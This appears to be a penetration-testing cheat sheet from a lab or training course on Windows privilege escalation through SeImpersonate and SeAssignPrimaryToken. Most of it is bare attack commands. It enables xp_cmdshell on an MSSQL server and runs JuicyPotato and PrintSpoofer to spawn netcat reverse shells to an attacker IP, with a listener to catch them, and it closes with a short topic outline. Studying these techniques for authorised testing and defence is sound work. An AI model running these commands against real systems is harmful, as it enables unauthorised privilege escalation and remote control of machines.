seimpersonate-and-seassignprimarytoken

mssqlclient.py sql_dev@10.129.43.30 -windows-auth

enable_xp_cmdshell

xp_cmdshell whoami
xp_cmdshell whoami /priv

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

nc -lnvp 8443

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

Check your privileges

whoami /priv

Powershell scripts that could increase privileges

Import-module .\Enable-Privileges.ps1

.\EnableAllTokenPrivs.ps1

xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.16.25 8443 -e cmd.exe" -t *

Juicy-potato do not work on windows server 2019 and windows 10 build 1809 onwards:

Read more in details: printspoofer-abusing-impersonate-privileges

xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeImpersonate Privilege: - Its purpose and how it's used to impersonate other user tokens. - How it's often abused for privilege escalation ("Potato" attacks).
SeAssignPrimaryToken Privilege: - Its purpose and how it relates to process tokens.
Token Impersonation: - The general concept of how process tokens work in Windows.
Privilege Escalation via Service Accounts: - How service accounts with these privileges can be exploited. - Examples involving SQL Server and IIS.
JuicyPotato: - Its use in exploiting SeImpersonate and SeAssignPrimaryToken. - Its limitations on newer Windows versions.
PrintSpoofer: - An alternative to JuicyPotato for newer Windows versions. - Its use in exploiting impersonation privileges.
MSSQL Exploitation: - Using xp_cmdshell to gain code execution. - Using mssqlclient.py to connect to a sql server.
Reverse Shells: - Using netcat to catch reverse shells.

Last updated 1 month ago